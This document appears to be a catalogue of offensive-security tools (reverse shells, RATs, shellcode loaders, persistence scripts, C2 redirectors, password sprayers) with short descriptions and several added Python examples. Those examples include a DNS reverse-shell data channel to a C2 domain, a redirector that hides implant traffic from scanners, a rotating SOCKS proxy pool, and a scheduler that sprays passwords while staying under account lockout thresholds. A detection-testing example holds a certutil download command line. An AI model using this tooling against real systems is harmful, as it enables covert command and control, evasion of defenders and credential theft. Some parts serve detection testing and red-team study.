
LOLBAS - Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)

  •    XSLT

There are currently three different lists. The goal of these lists is to document every binary, script and library that can be used for Living Off The Land techniques.

sherlock - 🔎 Hunt down social media accounts by username across social networks

  •    Python

Accounts found are stored in an individual text file named after the username (e.g. user123.txt). If you are using Anaconda on Windows, 'python3' might not work; use 'python' instead.

chashell - Chashell is a Go reverse shell that communicates over DNS

  •    Go

Chashell is a Go reverse shell that communicates over DNS, which lets it get out of networks where firewalls or tight egress filtering block other protocols. It ships with a multi-client control server named chaserv.
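To show what "communicates over DNS" involves, here is an added example (not chashell's code or wire format) of the one piece every DNS reverse shell needs: chunking a payload into query names that respect the RFC 1035 limits (63 octets per label, 253 per name) and reassembling it on the authoritative server, tolerating out-of-order arrival. The name layout, the session label and the domain c2.example.com are assumptions for this example, and the sample output is constructed.

```python
"""Carry a payload over DNS query names, as a reverse shell over DNS must.

Constructed example, not chashell's wire format: each query name carries
one numbered chunk of base32 data under a session label and the C2 domain.
"""
from __future__ import annotations

import base64
import math

MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # longest name that fits the 255-octet wire limit


def _b32(data: bytes) -> str:
    # Unpadded, lowercase base32: DNS names are case-insensitive and '='
    # is not a valid hostname character.
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    return base64.b32decode(text.upper() + "=" * (-len(text) % 8))


def encode_to_names(payload: bytes, session: str, domain: str) -> list[str]:
    """Split payload into query names: <seq>-<total>.<data labels>.<session>.<domain>."""
    suffix_len = len(session) + len(domain) + 2        # ".session.domain"
    header_len = len("9999-9999.")                      # worst-case counter label
    budget = MAX_NAME - suffix_len - header_len
    n_labels = budget // (MAX_LABEL + 1)                # full labels plus their dots
    bytes_per_chunk = (n_labels * MAX_LABEL // 8) * 5   # base32: 5 bytes -> 8 chars
    total = max(1, math.ceil(len(payload) / bytes_per_chunk))
    names = []
    for seq in range(total):
        chunk = payload[seq * bytes_per_chunk:(seq + 1) * bytes_per_chunk]
        text = _b32(chunk)
        labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
        names.append(".".join([f"{seq}-{total}", *labels, session, domain]))
    return names


def decode_names(names, session: str, domain: str) -> bytes | None:
    """Reassemble chunks from the queries seen by the authoritative server.

    Queries may arrive out of order (resolvers retry and parallelise);
    returns None until every chunk of the message has been seen.
    """
    suffix = f".{session}.{domain}"
    chunks: dict[int, bytes] = {}
    total = None
    for name in names:
        if not name.endswith(suffix):
            continue                                    # unrelated query
        head, _, data = name[:-len(suffix)].partition(".")
        seq_s, _, total_s = head.partition("-")
        try:
            seq, total = int(seq_s), int(total_s)
        except ValueError:
            continue                                    # malformed, ignore
        chunks[seq] = _unb32(data.replace(".", ""))
    if total is None or len(chunks) != total:
        return None
    return b"".join(chunks[i] for i in range(total))


# Constructed sample: command output an implant might send back.
SAMPLE_OUTPUT = b"uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)\n" * 8


def demo() -> dict:
    names = encode_to_names(SAMPLE_OUTPUT, "a1b2", "c2.example.com")
    return {
        "queries": len(names),
        "longest_name": max(len(n) for n in names),
        "longest_label": max(len(l) for n in names for l in n.split(".")),
        # feed the queries back in reverse to show order does not matter
        "round_trip": decode_names(reversed(names), "a1b2", "c2.example.com") == SAMPLE_OUTPUT,
    }
```

With these parameters the 456-byte sample fits in four queries of at most 210 characters. The same budget arithmetic is what limits throughput of any DNS channel: roughly 100 bytes of payload per query here, which is why such shells are slow and why a spike of long, high-entropy subdomains under one domain is a useful detection signal.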

GTFOBins - Curated list of Unix binaries that can be exploited to bypass local security restrictions

  •    HTML

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. Browse the project at https://gtfobins.github.io/.

serpentine - C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends

  •    C++

Disclaimer: serpentine is created for educational and research purposes, and is only intended to be employed in legal red team operations. Malicious and illegal use is not condoned and author/contributors do not take any responsibility for any damage caused by malicious actors using any software presented herein. serpentine is a Windows RAT (Remote Administration Tool) that lets you interact with the clients using a multiplatform RESTful C2 server.

gray_hat_csharp_code - This repository contains full code examples from the book Gray Hat C#

  •    CSharp

This repository contains fully fleshed-out code examples from the book Gray Hat C#. In this book, a wide variety of security-oriented tools and libraries are written in C#, allowing cross-platform automation of the most crucial parts of a security engineer's role in a modern organization. Many of the topics will also be useful for hobbyists and security enthusiasts who want more experience with common security concepts and tools, with real-world examples for both offensive and defensive purposes. The book covers a broad slice of the concepts a modern security engineer must be familiar with, starting with a brief introduction to the C# language. After the introduction, it focuses on fuzzing web application vulnerabilities and writing exploits for them. This is followed by C# payloads for pentesters to use for remote command execution and persistence. It then moves on to security tool automation using the tools' real APIs, not just calling programs from the system shell, and the final chapters cover reverse engineering and forensics.

go-shellcode - Load shellcode into a new process

  •    Go

This program runs shellcode as its own process, entirely from memory; it was written to evade anti-virus detection. Keep in mind that only 64-bit shellcode will run in a 64-bit process: the loader cannot detect your shellcode's architecture, so build the shellcode for the architecture of the process that will run it.

HoleySocks - Cross-Platform Reverse Socks Proxy in Go

  •    Go

A simple cross-platform reverse SOCKS proxy. All the parameters needed to start the SOCKS server and forward it over SSH can be embedded in the binary so that no CLI flags are needed: create config/ssh.json and build with the linker flag -X main.static=1 (go build -ldflags "-X main.static=1").

doxycannon - A poorman's proxycannon and botnet, using docker, ovpn files, and a dante socks5 proxy

  •    Python

Doxycannon takes a pool of OpenVPN configuration files and creates a Docker container for each one. Once its VPN connection is up, each container spawns a SOCKS5 proxy server and binds it to a port on the Docker host. Combined with tools such as Burp Suite or proxychains, this gives you a private botnet-style proxy pool on the cheap. Use the --single flag to bring up the proxies and front them with a single rotating proxy.
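Both HoleySocks and doxycannon hand you SOCKS5 listeners; what a client actually sends to one of them is short. The following is an added example, not code from either project: both sides of the RFC 1928 CONNECT exchange (client messages built, proxy-side messages parsed) plus a round-robin rotator over a pool of local SOCKS5 ports like the ones doxycannon binds on the Docker host. The pool addresses and ports are assumed; only connect_via does network I/O.

```python
"""SOCKS5 (RFC 1928) handshake messages plus a rotating proxy pool.

Constructed example: builds and parses both sides of the CONNECT exchange
and round-robins over a pool of local SOCKS5 endpoints (assumed ports).
"""
from __future__ import annotations

import itertools
import socket
import struct

VER = 0x05
NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REP_SUCCESS = 0x00


def build_greeting() -> bytes:
    # client -> proxy: version, one method offered, "no authentication"
    return bytes([VER, 0x01, NO_AUTH])


def parse_method_selection(data: bytes) -> int:
    # proxy -> client: version, chosen method (0xFF = none acceptable)
    if len(data) != 2 or data[0] != VER:
        raise ValueError("not a SOCKS5 method selection")
    return data[1]


def build_connect(host: str, port: int) -> bytes:
    # client -> proxy: VER CMD RSV ATYP DST.ADDR DST.PORT. Names go in the
    # domain form so the proxy resolves them: no DNS lookup leaks from the client.
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        raw = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(raw)]) + raw
    return bytes([VER, CMD_CONNECT, 0x00]) + addr + struct.pack(">H", port)


def parse_connect_request(data: bytes) -> tuple[str, int]:
    # proxy side: decode what the client asked for
    if data[:3] != bytes([VER, CMD_CONNECT, 0x00]):
        raise ValueError("unsupported request")
    if data[3] == ATYP_IPV4:
        host, rest = socket.inet_ntoa(data[4:8]), data[8:]
    elif data[3] == ATYP_DOMAIN:
        n = data[4]
        host, rest = data[5:5 + n].decode("idna"), data[5 + n:]
    else:
        raise ValueError("address type not handled here")
    (port,) = struct.unpack(">H", rest[:2])
    return host, port


def build_connect_reply(rep: int = REP_SUCCESS) -> bytes:
    # proxy -> client: VER REP RSV ATYP BND.ADDR BND.PORT (bind address zeroed)
    return bytes([VER, rep, 0x00, ATYP_IPV4]) + b"\x00\x00\x00\x00\x00\x00"


def parse_connect_reply(data: bytes) -> int:
    if len(data) < 4 or data[0] != VER:
        raise ValueError("not a SOCKS5 reply")
    return data[1]


class ProxyRotator:
    """Round-robin over SOCKS5 endpoints so each connection leaves via a different exit."""

    def __init__(self, endpoints):
        self._cycle = itertools.cycle(list(endpoints))

    def next_proxy(self) -> tuple[str, int]:
        return next(self._cycle)


def connect_via(proxy: tuple[str, int], host: str, port: int, timeout: float = 10.0) -> socket.socket:
    """Open a TCP stream to host:port through one SOCKS5 proxy (does real I/O)."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(build_greeting())
    if parse_method_selection(s.recv(2)) != NO_AUTH:
        s.close()
        raise ConnectionError("proxy demands authentication")
    s.sendall(build_connect(host, port))
    if parse_connect_reply(s.recv(10)) != REP_SUCCESS:
        s.close()
        raise ConnectionError("proxy refused CONNECT")
    return s


# Assumed pool: doxycannon-style SOCKS5 listeners on the Docker host.
POOL = [("127.0.0.1", 5000 + i) for i in range(4)]
```

Usage is `connect_via(ProxyRotator(POOL).next_proxy(), "example.com", 443)` per connection; whether a target sees one source IP per request or one per session depends on whether you rotate per connection or per client, which is exactly the knob a proxy rotator turns.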

gorsh - A Golang Implant and Tmux-driven C2 Interface

  •    Go

The project's goals: learn Go, make a throwaway reverse shell for things like CTFs, and learn about host-based OPSEC considerations when writing an implant. See the official Go documentation for an introduction to developing with Go and setting up your Go environment (including the $GOPATH environment variable).

ruse - a secure and highly-portable reverse proxy (redirector) for your Red Team infrastructure.

  •    Go

Ruse is a secure, multi-platform, selective reverse proxy (or redirector) that is fast and easy to deploy. It helps conceal C2 communications and reverse-shell traffic carried over HTTP. Ruse combines the core features of Python's SimpleHTTPServer, Apache's mod_rewrite and SSL ProxyPass in a single, self-contained and highly portable executable.
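The word "selective" is the important one: a redirector only forwards requests that look like the implant's, and serves something harmless to scanners and analysts. The following added example (not ruse's code or its configuration format) shows the decision logic such a redirector runs per request: first-match rules on method, path, User-Agent, a required header and source network, falling through to a decoy. The upstream address, the User-Agent pattern and the X-Request-Id check are assumptions for the example.

```python
"""Selective redirector rules: proxy only traffic that looks like your
implant's, serve a harmless page to everyone else.

Constructed example (not ruse's own code or config format): a rule is a
set of conditions on the request; the first match wins.
"""
from __future__ import annotations

import fnmatch
import ipaddress
from dataclasses import dataclass


@dataclass
class Request:
    method: str
    path: str
    headers: dict            # header names lower-cased, as most servers expose them
    client_ip: str = ""


@dataclass
class Rule:
    upstream: str                         # where matching requests are proxied
    methods: tuple = ("GET", "POST")
    path_glob: str = "*"
    user_agent_glob: str = "*"
    required_header: tuple | None = None  # (name, exact value) the implant always sends
    allow_cidrs: tuple = ()               # empty = any source network

    def matches(self, req: Request) -> bool:
        if req.method not in self.methods:
            return False
        if not fnmatch.fnmatchcase(req.path, self.path_glob):
            return False
        if not fnmatch.fnmatchcase(req.headers.get("user-agent", ""), self.user_agent_glob):
            return False
        if self.required_header:
            name, value = self.required_header
            if req.headers.get(name.lower()) != value:
                return False
        if self.allow_cidrs:
            if not req.client_ip:
                return False
            ip = ipaddress.ip_address(req.client_ip)
            if not any(ip in ipaddress.ip_network(c) for c in self.allow_cidrs):
                return False
        return True


def route(req: Request, rules: list[Rule], decoy: str = "decoy") -> tuple[str, str]:
    """Return ("proxy", upstream) for the first matching rule, else ("decoy", decoy)."""
    for rule in rules:
        if rule.matches(req):
            return "proxy", rule.upstream
    return "decoy", decoy


# Assumed rule set: the implant beacons with a fixed UA prefix to /api/v2/*
# and always carries an X-Request-Id; everything else gets the decoy site.
RULES = [
    Rule(upstream="https://10.10.0.5:8443", path_glob="/api/v2/*",
         user_agent_glob="Mozilla/5.0 (Windows NT 10.0; Win64; x64)*",
         required_header=("X-Request-Id", "7f3a")),
]

UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Constructed requests: a beacon, a curl scan of the same path, a beacon
# missing its header.
BEACON = Request("POST", "/api/v2/tasks", {"user-agent": UA, "x-request-id": "7f3a"}, "203.0.113.9")
SCANNER = Request("GET", "/api/v2/tasks", {"user-agent": "curl/8.0"}, "198.51.100.7")
NO_HEADER = Request("POST", "/api/v2/tasks", {"user-agent": UA}, "203.0.113.9")
```

The practical caveat: anything a rule keys on (the UA string, the header value, the path) is also what a defender can replay once they have captured one beacon, so rules like these buy you quiet against casual scanning, not against an analyst who has your traffic.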

RedTeam - One line PS scripts that may come handy during your network assesment

  •    PowerShell

The PowerShell scripts collected here cover tasks such as getting the list of Domain Controllers in a network and writing it to a CSV file on the C: drive, which is useful during network pentesting and similar situations. Another one-liner runs the Mimikatz PowerShell script by pulling it directly from GitHub and executing it in memory on your system.

MalwarePersistenceScripts - A collection of scripts I've written to help red and blue teams with malware persistence techniques

  •    PowerShell

A collection of scripts I've written to help red and blue teams with malware persistence techniques. I take no responsibility for how they're used. These are techniques that I regularly use to ensure that my agents survive reboots. The majority of my persistence scripts are written in PowerShell, since it's an excuse for me to learn it. May these scripts help you evade many a blue team.

DNS-Persist - DNS-Persist is a post-exploitation agent which uses DNS for command and control.

  •    C++

DNS-Persist is a post-exploitation agent which uses DNS for command and control. The server-side code is in Python and the agent is written in C++. This is the first version; more features and improvements will be made in the future. DO NOT USE THIS SOFTWARE FOR ILLEGAL PURPOSES.

MalwLess - Test Blue Team detections without running any attack.

  •    CSharp

MalwLess is an open source tool that allows you to simulate system compromise or attack behaviours without running processes or PoCs. The tool is designed to test Blue Team detections and SIEM correlation rules. It provides a framework based on rules that anyone can write, so when a new technique or attack comes out you can write your own rules and share them with the community. These rules can simulate Sysmon or PowerShell events. MalwLess parses the rules and writes the events directly to the Windows Event Log, from where you can forward them to your event collector.
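To make the "simulate events without running the attack" idea concrete, here is an added example (not MalwLess's code or rule schema) that renders a synthetic Sysmon Event ID 1 (process creation) in Windows Event XML shape from a rule describing a certutil download, a LOLBAS technique, and then runs a Sigma-style detection over the parsed event. Writing the event into the Windows Event Log is platform-specific (for example the Write-EventLog cmdlet) and is left out; the rule contents, the command line and the user are constructed.

```python
"""Render a synthetic Sysmon-style process-creation event from a rule and
run a detection over it, without executing the technique.

Constructed example (not MalwLess's rule schema): the rule lists the
Sysmon fields to fake; the event is rendered in Windows Event XML so a
SIEM parser sees what a real Sysmon Event ID 1 looks like.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET
from datetime import datetime, timezone
from xml.sax.saxutils import escape, quoteattr

SYSMON_PROVIDER = "Microsoft-Windows-Sysmon"
EVENT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVENT_NS}

# Simulation rule: certutil used as a downloader (LOLBAS), no certutil actually run.
RULE = {
    "name": "certutil urlcache download",
    "event_id": 1,
    "fields": {
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.7/p.exe C:\Users\Public\p.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "User": r"CORP\jdoe",
    },
}

# A legitimate certutil use, to check the detection does not fire on it.
BENIGN = {
    "name": "certutil verify",
    "event_id": 1,
    "fields": {
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil.exe -verify cert.cer",
        "ParentImage": r"C:\Windows\explorer.exe",
        "User": r"CORP\jdoe",
    },
}


def render_event(rule: dict, when: datetime | None = None) -> str:
    """Produce the XML a Sysmon event carries in the Windows Event Log."""
    when = when or datetime.now(timezone.utc)
    data = "".join(f"<Data Name={quoteattr(k)}>{escape(v)}</Data>" for k, v in rule["fields"].items())
    return (
        f'<Event xmlns="{EVENT_NS}">'
        f'<System><Provider Name="{SYSMON_PROVIDER}"/><EventID>{rule["event_id"]}</EventID>'
        f'<TimeCreated SystemTime="{when.isoformat()}"/></System>'
        f"<EventData>{data}</EventData></Event>"
    )


def parse_event(xml_text: str) -> dict:
    """Flatten the event into a field dict, the way a SIEM parser would."""
    # The XML is self-generated here; parse untrusted event XML with defusedxml.
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    fields["EventID"] = int(root.findtext("e:System/e:EventID", namespaces=NS))
    fields["Provider"] = root.find("e:System/e:Provider", NS).get("Name")
    return fields


# Sigma-style detection: certutil fetching a remote file.
DETECTION = {
    "title": "Certutil remote download",
    "event_id": 1,
    "image_endswith": "\\certutil.exe",
    "commandline_contains_all": ["-urlcache", "http"],
}


def detect(fields: dict, detection: dict = DETECTION) -> bool:
    if fields.get("Provider") != SYSMON_PROVIDER or fields.get("EventID") != detection["event_id"]:
        return False
    cmd = fields.get("CommandLine", "").lower()
    return (fields.get("Image", "").lower().endswith(detection["image_endswith"])
            and all(tok in cmd for tok in detection["commandline_contains_all"]))
```

The point of the exercise is the pair of outcomes: the synthetic malicious event must trip the rule and the benign one must not, and neither required certutil to touch the network. If the same XML is written into the log and forwarded, the test exercises the whole pipeline (agent, collector, SIEM parsing, correlation rule) rather than only the rule logic shown here.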

WSAAcceptBackdoor - Winsock accept() Backdoor Implant.

  •    C

This project is a POC implementation of a DLL implant that acts as a backdoor on the Winsock accept() API. Once the DLL is injected into the target process, every accept call is intercepted using Microsoft's Detours library and redirected into the BackdooredAccept function. When a connection arrives from a pre-defined source port, BackdooredAccept launches a cmd.exe process and binds the accepted socket to that process's standard input and output through a named pipe.

trident - automated password spraying tool

  •    Go

Deploying trident requires a Google Cloud project, a domain name (for the orchestrator API) and a Cloudflare Access configuration for that domain; Cloudflare Access is used to authenticate requests to the orchestrator API. (The README's architecture diagram was generated using Diagrams; the Go gopher was designed by Renee French and is licensed under CC BY 3.0.)
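What makes a spraying tool "automated" rather than a loop over a wordlist is lockout awareness: every user must stay below the account lockout threshold inside the policy's observation window. The following added example (not trident's scheduler) builds such a schedule and includes the checker that computes the worst-case attempts any one user sees in a sliding window, which is what the identity provider counts. The users, passwords and lockout policy are constructed.

```python
"""Lockout-aware password spray schedule.

Constructed example, not trident's scheduler: every user gets at most
lockout_threshold - 1 attempts inside any observation window, so a spray
never trips the account lockout policy. Names, passwords and policy
values below are made up.
"""
from __future__ import annotations

from collections import defaultdict, deque


def plan_spray(users, passwords, lockout_threshold, window_seconds, delay_seconds=5.0):
    """Return [(t_seconds, user, password), ...] in send order, t relative to start."""
    max_per_window = lockout_threshold - 1          # keep one attempt of headroom
    if max_per_window < 1:
        raise ValueError("policy leaves no safe attempts")
    history = {u: deque() for u in users}           # recent attempt times per user
    plan, now = [], 0.0
    for pw in passwords:                            # one password per round, all users
        for u in users:
            h = history[u]
            while h and now - h[0] >= window_seconds:   # forget aged-out attempts
                h.popleft()
            if len(h) >= max_per_window:                # next try would hit the threshold
                now = h[0] + window_seconds             # sleep until the oldest expires
                while h and now - h[0] >= window_seconds:
                    h.popleft()
            plan.append((now, u, pw))
            h.append(now)
            now += delay_seconds                        # pacing between requests
    return plan


def max_attempts_in_window(plan, window_seconds) -> int:
    """Worst-case attempts against one user inside any window of that length."""
    by_user = defaultdict(list)
    for t, u, _ in plan:
        by_user[u].append(t)
    worst = 0
    for times in by_user.values():
        times.sort()
        j = 0
        for i, t in enumerate(times):
            while t - times[j] >= window_seconds:
                j += 1
            worst = max(worst, i - j + 1)
    return worst


USERS = ["alice", "bob", "carol"]
PASSWORDS = ["Winter2024!", "Spring2024!", "Summer2024!", "Autumn2024!", "Welcome1!"]
# Constructed policy: 3 failed logins within 30 minutes locks the account.
POLICY = {"lockout_threshold": 3, "window_seconds": 30 * 60}


def demo():
    plan = plan_spray(USERS, PASSWORDS, **POLICY)
    return plan, max_attempts_in_window(plan, POLICY["window_seconds"])
```

With this policy the third password for every user is not sent until 30 minutes after that user's first attempt, and the checker confirms no user ever accumulates more than two attempts in any 30-minute window. The scheduler assumes the provider's window is a strict one; if a target resets its counter only on success or uses a longer window than documented, widen window_seconds rather than trusting the edge case.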

AggressorScripts_0x727 - Cobalt Strike AggressorScripts For Red Team

  •    PowerShell

Aggressor Script is the scripting language built into Cobalt Strike version 3.0 and later. Aggressor Script allows you to modify and extend the Cobalt Strike client.